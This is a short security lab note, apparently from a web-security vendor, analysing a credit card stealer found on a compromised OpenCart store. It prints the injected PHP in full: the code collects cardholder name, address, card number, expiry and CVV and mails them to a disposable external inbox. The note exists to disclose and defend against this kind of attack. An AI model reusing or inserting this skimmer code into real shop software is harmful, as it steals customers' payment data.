Credit Card Stealer on OpenCart CMS

Labs Note

We have previously analyzed many Credit Card stealers code, specially targeting the Magento platform:

However, this type of malicious code is not only being used against Magento, as we see if often on other ecommerce platforms. To give an example, we were analyzing a compromised OpenCart site and found the following entry on the file:

$smail=$order_info['order_id']."|".$order_info['payment_firstname']."|".$order_info['payment_lastname'].
"|".$order_info['payment_address_1']."|".$order_info['payment_city']."|"
.$order_info['payment_postcode']."|".$order_info['payment_zone']."
|".$order_info['payment_country']."|".$order_info['telephone']."|".$this->request->post['cc_expire_date_month'].
"|".$this->request->post['cc_expire_date_year']."|".$this->request->post['cc_cvv2']."|".$this->
request->post['cc_number'];
mail("swordsofnorthshirei@yopmail.com","infectedOpenCart",$smail,"From: infected@anotheropencartsite.dom\r\nReply-to: bademail@yopmail.com");

If you are not familiar with PHP, this code gets all credit card transaction data (including name, address, CVV, etc) and email to swordsofnorthshirei@yopmail.com. Yopmail(.)com is a domain that allows the use of disposable e-mail inboxes.

As you can see, ecommerce sites (and customers) have a lot more to lose when they get compromised as they process and deal with critical information from their users. Whenever possible, we recommend using 3rd party providers, like Stripe or Paypal to reduce your PCI scope and do not allow credit card data to pass through your site.

If you run OpenCart or any other ecommerce platform, check out our Sucuri Firewall to protect your site from attacks and compromises.

You May Also Like